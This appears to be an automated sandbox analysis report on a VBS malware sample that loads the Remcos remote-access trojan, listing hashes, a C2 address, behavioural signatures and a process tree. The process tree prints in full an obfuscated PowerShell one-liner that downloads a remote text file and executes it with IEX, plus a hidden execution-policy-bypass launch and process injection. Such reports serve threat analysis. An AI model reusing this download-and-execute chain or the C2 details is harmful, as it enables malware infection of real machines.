Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
21-04-2021 17:11
Static task
static1
Behavioral task
behavioral1
Sample
2.vbs
Resource
win7v20210410
General
-
Target
2.vbs
-
Size
662B
-
MD5
8da164753530662b1f603f7b23413223
-
SHA1
18a3665edcb3b3d3c53f9755bc225569a64ae642
-
SHA256
b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
-
SHA512
b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 7 2032 powershell.exe 9 2032 powershell.exe 11 2032 powershell.exe 13 2032 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1672 set thread context of 1628 1672 powershell.exe aspnet_regbrowsers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
powershell.exepowershell.exepid process 2032 powershell.exe 2032 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_regbrowsers.exepid process 1628 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 368 wrote to memory of 2032 368 WScript.exe powershell.exe PID 368 wrote to memory of 2032 368 WScript.exe powershell.exe PID 368 wrote to memory of 2032 368 WScript.exe powershell.exe PID 2032 wrote to memory of 1672 2032 powershell.exe powershell.exe PID 2032 wrote to memory of 1672 2032 powershell.exe powershell.exe PID 2032 wrote to memory of 1672 2032 powershell.exe powershell.exe PID 1672 wrote to memory of 708 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 708 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 708 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 708 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1124 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1124 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1124 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1124 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1004 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1004 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1004 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1004 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1344 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1344 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1344 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1344 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1972 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1972 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1972 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1972 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe PID 1672 wrote to memory of 1628 1672 powershell.exe aspnet_regbrowsers.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
6e9a7aa8321f264772ea32e4d912cbda
SHA106c8aa1f7a5698f32bcd36e61a10cdd218880232
SHA25621069802d40e4ae283ea9289b827580d12f000c408b769a051dc430c956f8519
SHA512da47bbe8f12998993312f9a40a4d84476f5abcf7cd4bb90014fbf4461cf078261ef7fd899828d35b2d81b00202b7bc9295464969ff58fb28ddd629f480a73cbd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
b870fb4c34b3de2001a769fcebdda51c
SHA1649bfed97cfbccbbc57516f62b30dea0a8e3547a
SHA25615ae9f521efdf58238619bb7cd2a2a0ab4c3097a52e7ca7b67c249baaa653de8
SHA5121f9778b71144f1f7403158cfa4b5fe1f87f971cd7c5ca1e13ea12411f90130f1bd1be89ee2c77f3e50f20bbef055de153c616b5b2bc28213c7ffa5d4fe9f208c
-
C:\Users\Public\ Microsoft.ps1MD5
b5795726bb04f5f9584184ae1f50777b
SHA191b250e76c41066a009b70200c5254a40980228b
SHA2565d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784
SHA51210ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb
-
memory/368-59-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmpFilesize
8KB
-
memory/1628-88-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1628-87-0x0000000076661000-0x0000000076663000-memory.dmpFilesize
8KB
-
memory/1628-86-0x000000000042EEEF-mapping.dmp
-
memory/1628-85-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1672-70-0x0000000000000000-mapping.dmp
-
memory/1672-77-0x000000001A9F0000-0x000000001A9F2000-memory.dmpFilesize
8KB
-
memory/1672-78-0x000000001A9F4000-0x000000001A9F6000-memory.dmpFilesize
8KB
-
memory/1672-82-0x0000000002690000-0x00000000026A8000-memory.dmpFilesize
96KB
-
memory/2032-69-0x000000001B920000-0x000000001B921000-memory.dmpFilesize
4KB
-
memory/2032-68-0x000000001B850000-0x000000001B851000-memory.dmpFilesize
4KB
-
memory/2032-67-0x0000000001D90000-0x0000000001D91000-memory.dmpFilesize
4KB
-
memory/2032-66-0x000000001ABA4000-0x000000001ABA6000-memory.dmpFilesize
8KB
-
memory/2032-65-0x000000001ABA0000-0x000000001ABA2000-memory.dmpFilesize
8KB
-
memory/2032-64-0x0000000001F10000-0x0000000001F11000-memory.dmpFilesize
4KB
-
memory/2032-63-0x000000001AC20000-0x000000001AC21000-memory.dmpFilesize
4KB
-
memory/2032-62-0x0000000001D50000-0x0000000001D51000-memory.dmpFilesize
4KB
-
memory/2032-60-0x0000000000000000-mapping.dmp